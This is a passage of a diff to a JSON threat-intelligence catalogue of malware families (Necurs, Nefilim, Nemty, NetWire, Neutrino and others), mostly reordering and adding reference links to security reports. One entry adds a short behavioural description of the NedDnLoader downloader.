"https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/", + "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", + "http://www.secureworks.com/research/threat-profiles/gold-riverview", + "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", + "https://www.secureworks.com/research/threat-profiles/gold-riverview", + "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", + "https://intel471.com/blog/a-brief-history-of-ta505", + "https://bin.re/blog/the-dgas-of-necurs/" ], "synonyms": [ "nucurs" @@ -35169,12 +36779,17 @@ "value": "Necurs" }, { - "description": "", + "description": "NedDnLoader is an HTTP(S) downloader that uses AES for C&C trafic encryption.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, type and free disk space of all drives, and a list of currently running processes. It uses three typical parameter names for HTTP POST requests: ned, gl, hl. The usual payload downloaded with NedDnLoader is Torisma.\r\n\r\nThe internal DLL name of NedDnLoader is usually Dn.dll, Dn64.dll or DnDll.dll. It is deployed either as a standalone payload or within a trojanized MFC application project. It contains specific RTTI symbols like \".?AVCWininet_Protocol@@\" or \".?AVCMFC_DLLApp@@\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader", + "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/", + "https://www.telsy.com/lazarus-gate/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/" ], "synonyms": [], "type": [] @@ -35187,35 +36802,35 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry", - "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/", - "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware", - "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/", - "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://securelist.com/evolution-of-jsworm-ransomware/102428/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf", "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", "https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html", - "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "http://www.secureworks.com/research/threat-profiles/gold-mansard", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-mansard", "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", - "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", - "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/", "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks", - "https://securelist.com/evolution-of-jsworm-ransomware/102428/", - "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf" + "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/", + "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/", + "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a" ], "synonyms": [ "Nephilim" @@ -35230,7 +36845,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemesis", - "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor" + "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor", + "https://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5" ], "synonyms": [ "Project Nemesis" @@ -35261,33 +36877,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/", - "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html", - "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/", - "http://www.secureworks.com/research/threat-profiles/gold-mansard", - "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/", - "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", - "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/", - "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/", - "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b", "https://securelist.com/evolution-of-jsworm-ransomware/102428/", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/", + "https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/", + "http://www.secureworks.com/research/threat-profiles/gold-mansard", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", + "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/", + "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw", + "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/", + "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html", + "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", + "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/", + "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/", - "https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/" + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] @@ -35313,10 +36929,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta", - "https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest", - "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html", - "https://www.virusradar.com/en/Win32_Neshta.A/description" + "https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest", + "https://www.virusradar.com/en/Win32_Neshta.A/description", + "https://www.mandiant.com/resources/pe-file-infecting-malware-ot" ], "synonyms": [], "type": [] @@ -35329,11 +36945,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg", - "https://youtu.be/_kzFNQySEMw?t=789", + "https://securelist.com/lazarus-under-the-hood/77908/", "https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf", + "https://content.fireeye.com/apt/rpt-apt38", "https://youtu.be/8hJyLkLHH8Q?t=1208", - "https://content.fireeye.com/apt/rpt-apt38" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf", + "https://youtu.be/_kzFNQySEMw?t=789" ], "synonyms": [], "type": [] @@ -35372,9 +36989,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", - "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/" + "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf" ], "synonyms": [ "Neteagle_Scout", @@ -35390,13 +37007,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netfilter", - "https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf", - "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit", + "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/", "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", - "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users", - "https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/", + "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit", + "https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf", "https://www.intezer.com/blog/malware-analysis/fast-insights-for-a-microsoft-signed-netfilter-rootkit/", - "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/" + "https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/", + "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users" ], "synonyms": [], "type": [] @@ -35448,19 +37065,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", - "https://asec.ahnlab.com/en/45312/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", - "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", - "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", - "https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/", - "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", - "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer", "https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html", - "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/", "https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/", + "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", + "https://asec.ahnlab.com/en/45312/", + "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", + "http://www.netsupportmanager.com/index.asp", "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "http://www.netsupportmanager.com/index.asp" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", + "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", + "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer", + "https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/", + "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" ], "synonyms": [ "NetSupport" @@ -35475,10 +37092,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", - "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf", "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/" ], "synonyms": [ "TravNet" @@ -35493,57 +37110,58 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", - "https://news.drweb.ru/show/?i=13281&c=23", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA", - "https://www.youtube.com/watch?v=TeQdZxP0RYY", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", - "https://community.riskiq.com/article/24759ad2", - "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", - "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html", + "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg", + "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", "https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://lmntrix.com/lab/analysis-of-netwire-rat/", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://www.circl.lu/pub/tr-23/", - "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", + "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://threatpost.com/ta2541-apt-rats-aviation/178422/", + "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html", + "https://lmntrix.com/lab/analysis-of-netwire-rat/", + "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html", + "https://community.riskiq.com/article/24759ad2", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign", + "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf", + "https://www.circl.lu/pub/tr-23/", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/", + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", + "https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", + "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://www.youtube.com/watch?v=TeQdZxP0RYY", + "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", + "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://www.theregister.com/2023/03/10/fbi_netwire_seizure/", - "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", - "https://threatpost.com/ta2541-apt-rats-aviation/178422/", - "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", - "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", - "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", - "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", - "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", - "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/", - "https://news.sophos.com/en-us/2020/05/14/raticate/", - "https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view", - "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", - "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", - "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html", - "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html", - "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", - "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg", "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://news.drweb.ru/show/?i=13281&c=23", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/" ], "synonyms": [ "NetWeird", @@ -35560,9 +37178,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.ncsc.gov.uk/alerts/turla-group-malware", - "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims" + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", + "https://www.secureworks.com/research/threat-profiles/iron-hunter" ], "synonyms": [], "type": [] @@ -35575,19 +37193,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", - "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", - "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", - "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", - "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", + "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "http://blog.ptsecurity.com/2019/08/finding-neutrino.html", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22", - "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", + "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", "https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html", - "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", + "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", - "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/" + 